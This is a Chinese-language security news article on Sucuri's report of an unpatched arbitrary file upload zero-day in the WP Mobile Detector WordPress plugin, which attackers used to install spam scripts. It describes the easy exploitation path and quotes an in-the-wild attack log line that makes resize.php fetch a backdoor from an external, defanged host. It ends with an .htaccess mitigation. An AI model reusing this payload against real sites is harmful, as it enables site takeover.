Sucuri的安全专家报道,由于WP移动探测器的一个应用广泛的插件中存在的漏洞导致越来越多的WordPress设备已经被黑客利用。
令人担忧的消息是在野外被威胁者利用的漏洞仍然没有修复补丁进行修复。
Sucuri的专家称,黑客主要利用在WP移动探测器插件中的这个漏洞进行安装和色情有关的垃圾邮件脚本。
自从该漏洞被披露之后,这个插件已经从官方的WordPress插件目录中被删除了。
“我们的研究团队开始深入研究问题,发现在这些WordPress网站中有一个共同点,那就是WP移动探测器的插件中有一个在5月31日被披露的任意文件上传的0-day漏洞。这个插件已经从WordPress资料库中被移除了,而且没有可用的补丁。”Sucuri发布的一篇博客文章中报道。“这个漏洞是在5月31日被公开披露的,但是根据我们的防火墙日志,自从5月27日以来,攻击一直存在。”
据估计,这个插件已经被安装在了超过10000个活跃的设备上。而且它们中的大多数仍然容易受到网络攻击。
这个漏洞导致该插件的输入验证失败,并允许攻击者提交恶意的PHP输入代码。
“这个漏洞很容易利用”Sucuri的报道说。“所有的攻击者需要做的只是向resize.php 或者 timthumb.php发送一个请求 (是的,timthumb在这种情况下包含resize.php),然后将后门软件的URL放在插件的目录中。”
这是我们在野外攻击中主动发现的负载中的一个:
188.73.152.166 – – [31/May/2016:23:54:43 -0400] "POST /wp-content/plugins/wp-mobile-detector/resize.php
Payload:src=hxxp://copia[.]ru/mig/tmp/css.php"
专家强调,由于没有修复补丁,这意味着最好的方法是卸载这个带有漏洞的WP移动探测器插件。
“我们强烈建议大家删除这个插件。如果你真的需要这个插件,部分临时修复的方法是在wp移动目录或者缓存目录中禁用PHP执行,例如在.htaccess文件中使用下面这段代码。”
<Files *.php>
deny from all
</Files>
被感染的WordPress网站的管理员可以向Sucuri请求支持。
发表评论
您还未登录,请先登录。
登录